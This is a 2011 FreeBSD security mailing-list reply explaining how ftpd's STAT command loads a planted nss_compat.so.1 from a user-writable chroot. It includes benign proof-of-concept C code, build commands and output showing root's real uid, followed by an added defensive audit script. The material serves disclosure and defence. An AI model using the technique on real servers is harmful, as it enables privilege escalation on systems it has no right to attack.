From: Przemyslaw Frasunek (przemyslaw@frasunek.com)
Date: Wed, 30 Nov 2011 22:09:18 +0100
To: Mike Tancsa
Cc: freebsd-security@freebsd.org
Subject: Re: ftpd security issue ?
Message-ID: <4ED69B7E.50505@frasunek.com>
In-Reply-To: <4ED68B4D.4020004@sentex.net>

> Saw this on FD... Anyone know any more details about this ?
> http://lists.grok.org.uk/pipermail/full-disclosure/2011-November/084372.html

This is a well-known hazard of chrooting to directories controlled by unprivileged users. In this case, the vulnerability exists because ftpd calls /bin/ls with uid=0 and euid!=0 when the STAT command is issued, and nss_compat.so is loaded by libc regardless of elevated privileges.
This can be proven by creating a dummy ~/lib/nss_compat.so.1:

[venglin@lagoon ~/lib]$ cat dummy.c
#include <stdio.h>
#include <unistd.h>

/* Runs when libc loads this object as nss_compat.so.1; records the real and effective uid of the loading process. */
void _init()
{
        FILE *fp = fopen("asdf", "w+");
        if (fp == NULL)
                return;
        fprintf(fp, "%d %d\n", getuid(), geteuid());
        fclose(fp);
}
[venglin@lagoon ~/lib]$ cc -o dummy.o -c dummy.c -fPIC
[venglin@lagoon ~/lib]$ cc -shared -Wl,-soname,dummy.so -o dummy.so dummy.o -nostartfiles
[venglin@lagoon ~/lib]$ mv dummy.so nss_compat.so.1

And after calling the STAT command:

[venglin@lagoon ~/lib]$ cat ~/asdf
0 3000

BTW, this vulnerability affects only configurations where /etc/ftpchroot exists or the anonymous user is allowed to create files inside the etc and lib dirs.

-- 
* Fido: 2:480/124 ** WWW: http://www.frasunek.com ** NICHDL: PMF9-RIPE *
* Jabber ID: venglin@nette.pl ** PGP ID: 2578FCAD ** HAM-RADIO: SQ5JIV *
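A defensive check for the configuration condition the message describes (a chrooted ftp user whose chroot contains an etc/ or lib/ directory they can write to, or an nss_*.so already planted there), as an added example that is not part of the original thread or of FreeBSD's ftpd. It assumes the /etc/ftpchroot format of one "user [dir]" per line with '#' comments, the user's home directory as the default (resolved with getent, an assumption), and skips @group entries.

```shell
#!/bin/sh
# Audit ftpd chroot directories for the condition described in the message:
# an etc/ or lib/ subdirectory the chrooted user can write to (and so could
# plant lib/nss_compat.so.1 in), or an nss_*.so object already present.
# Assumes the /etc/ftpchroot format "user [dir]" with '#' comments; entries
# with no dir default to the user's home (resolved with getent, an assumption).

# check_chroot DIR USER: print one finding per line; return 1 if any, else 0
check_chroot() {
    cdir=$1; cuser=$2; found=0
    for sub in etc lib; do
        p="$cdir/$sub"
        [ -d "$p" ] || continue
        line=$(ls -ld "$p")
        mode=${line%% *}                           # e.g. drwxr-xr-x
        owner=$(printf '%s\n' "$line" | awk '{print $3}')
        own_w=$(printf '%s' "$mode" | cut -c3)
        grp_w=$(printf '%s' "$mode" | cut -c6)
        oth_w=$(printf '%s' "$mode" | cut -c9)
        # group/world write bits are flagged unconditionally; the owner bit
        # only matters when the chrooted user is the owner (root-owned is fine)
        if [ "$grp_w" = w ] || [ "$oth_w" = w ] ||
           { [ "$owner" = "$cuser" ] && [ "$own_w" = w ]; }; then
            echo "WRITABLE $p (mode $mode, owner $owner)"
            found=1
        fi
        for so in "$p"/nss_*.so*; do
            [ -e "$so" ] || continue
            echo "PLANTED  $so"
            found=1
        done
    done
    return $found
}

# audit_ftpchroot FILE: run check_chroot for every user listed in FILE
audit_ftpchroot() {
    rc=0
    while read -r u d; do
        case "$u" in ''|\#*|@*) continue ;; esac   # blank, comment, @group
        [ -n "$d" ] || d=$(getent passwd "$u" | cut -d: -f6)
        if [ ! -d "$d" ]; then
            echo "MISSING  $u: $d"
            continue
        fi
        check_chroot "$d" "$u" || rc=1
    done < "$1"
    return $rc
}
```

Run it as `audit_ftpchroot /etc/ftpchroot`; a non-zero exit means at least one chroot needs its etc/ or lib/ made root-owned and non-writable.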